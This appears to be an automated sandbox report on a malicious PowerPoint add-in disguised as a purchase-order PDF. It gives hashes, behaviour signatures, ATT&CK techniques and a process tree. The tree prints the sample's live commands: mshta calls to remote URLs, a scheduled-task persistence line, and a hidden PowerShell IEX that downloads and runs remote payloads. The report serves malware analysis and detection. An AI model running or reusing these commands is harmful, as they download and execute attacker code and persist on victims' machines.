Analysis

  • max time kernel
    124s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    20-10-2021 06:38

General

  • Target

    PO-20102021,pdf.ppam

  • Size

    8KB

  • MD5

    3471cb088d588150df6e37e2200afbf9

  • SHA1

    90d89c9f5aaaae4c067f179651066303bc83f452

  • SHA256

    66a3e3be3b63626de046621d447103e0978f5b24d3de0f412230ed6c2bfd6e28

  • SHA512

    f01dc429d369a8502320775bf7b8fd7d56e8790ef2b91bfeea0b65fa5abf69f57a13f05493ccedb6606152682307f748b88879bc4afbe304c1e04a83cb017fb6

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 15 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-20102021,pdf.ppam"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:1148
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2036
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\System32\mshta.exe" https://www.bitly.com/wdowdpowdrufhjwijjd
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:336
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im winword.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1908
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1760
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/6.html\""
          3⤵
          • Creates scheduled task(s)
          PID:1972
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_67566eeb47104ffcb45eb2d55a0630a7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_80df20c857fc425bb4e96cfc21421a37.txt').GetResponse().GetResponseStream()).ReadToend());
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1008

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    3
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/336-68-0x00000000042D0000-0x00000000042D1000-memory.dmp
      Filesize

      4KB

    • memory/336-61-0x0000000000000000-mapping.dmp
    • memory/1008-66-0x0000000000000000-mapping.dmp
    • memory/1008-69-0x00000000024F0000-0x000000000313A000-memory.dmp
      Filesize

      12.3MB

    • memory/1148-55-0x00000000713D1000-0x00000000713D3000-memory.dmp
      Filesize

      8KB

    • memory/1148-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1148-59-0x00000000754A1000-0x00000000754A3000-memory.dmp
      Filesize

      8KB

    • memory/1148-60-0x00000000059E0000-0x00000000059E2000-memory.dmp
      Filesize

      8KB

    • memory/1148-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1148-54-0x00000000740B1000-0x00000000740B5000-memory.dmp
      Filesize

      16KB

    • memory/1760-64-0x0000000000000000-mapping.dmp
    • memory/1908-63-0x0000000000000000-mapping.dmp
    • memory/1972-65-0x0000000000000000-mapping.dmp
    • memory/2036-58-0x000007FEFBD11000-0x000007FEFBD13000-memory.dmp
      Filesize

      8KB

    • memory/2036-57-0x0000000000000000-mapping.dmp